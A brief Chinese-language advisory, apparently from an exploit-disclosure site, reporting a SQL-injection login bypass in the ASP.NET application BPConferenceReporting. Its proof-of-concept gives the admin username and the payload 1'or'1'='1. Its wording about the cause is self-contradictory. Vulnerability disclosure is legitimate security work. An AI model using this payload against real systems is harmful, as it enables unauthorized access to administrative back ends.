BPConferenceReporting Authentication 密码绕过漏洞

发布日期：2010-11.16
发布作者：v3n0m

影响版本：未知
官方地址：http://www.bpowerhouse.info

漏洞类型：万能密码
漏洞描述： BPConferenceReporting Authentication是一款ASP.NET的程序，后台登录验证严格过滤导致万能密码绕过SQL验证进入后台。

Exploit & p0c

_____________

登录地址

http://127.0.0.1/[path]/index.htm

绕过验证，万能密码

Username : admin

Password : 1'or'1'='1
 

标签分类：